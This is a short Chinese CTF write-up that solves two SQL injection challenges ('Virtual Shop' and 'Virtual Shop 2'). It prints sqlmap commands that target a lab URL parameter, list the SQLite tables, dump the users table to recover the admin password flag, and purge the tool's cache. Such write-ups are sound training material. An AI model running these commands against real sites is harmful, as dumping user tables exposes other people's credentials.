Bugku 2023 HackINI Virtual Shop 和 2023 HackINI Virtual Shop 2

目录

前置知识

解题过程

[Virtual Shop](#Virtual Shop)

[Virtual Shop 2](#Virtual Shop 2)

总结


前置知识

网络安全-SQL注入-CSDN博客

解题过程

Virtual Shop

打开靶场

可以看到URL有参数传输,再根据题目描述了数据库相关内容,可以确定为SQL注入

练习一下SQLMAP工具

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport

可以看到存在多种注入方式,并且数据库类型为SQLite,该数据库是轻量级数据库,没有数据库名。直接查询有哪些表

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport --tables

结合题目描述,flag应该是再users中admin的密码那里,直接dump表users的全部数据即可

复制代码
python sqlmap.py -u http://49.232.142.230:12470/filter?category=Sport -T users --dump

成功获取flag

复制代码
shellmates{Gg_b0Y_you_kNOW_w3ll_H0w_T0_uSe_uNiOn_4tTacK}

Virtual Shop 2

步骤与Virtual Shop相同,sqlmap注入前清除下缓存,要不然扫的是Virtual Shop的结果

复制代码
python sqlmap.py --purge

总结

一道基础的sql注入的题,可以手工注入练习,也可以直接sqlmap梭哈

相关推荐
码农12138号2 小时前
网络安全 文件包含漏洞
web安全·文件包含漏洞
Suckerbin19 小时前
Gaara: 1靶场渗透
安全·web安全·网络安全
飞Link20 小时前
【Django】Django 调用外部 Python 程序的完整指南
后端·python·django·sqlite
是喵斯特ya1 天前
phpstudy+安全狗搭建安全靶场
安全·web安全
bleach-1 天前
buuctf系列解题思路祥讲--[ZJCTF 2019]NiZhuanSiWei1——文件包含漏洞和伪协议的利用
安全·web安全·网络安全·php
zjeweler1 天前
redis tools gui ---Redis图形化漏洞利用工具
数据库·redis·web安全·缓存
码农12138号1 天前
网络安全-身份伪造
web安全·jwt·身份伪造
bleach-1 天前
文件描述符及Linux下利用反弹shell的各种方法
linux·websocket·web安全·网络安全·系统安全·信息与通信
ZeroNews内网穿透1 天前
RStudio Server 结合 ZeroNews,实现远程访问管理
运维·服务器·网络·数据库·网络协议·安全·web安全